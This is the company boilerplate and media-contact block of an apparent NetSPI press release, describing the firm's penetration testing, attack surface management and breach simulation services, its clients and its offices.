NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn. 

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI 
netspi@inkhouse.com
(774) 451-5142 

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X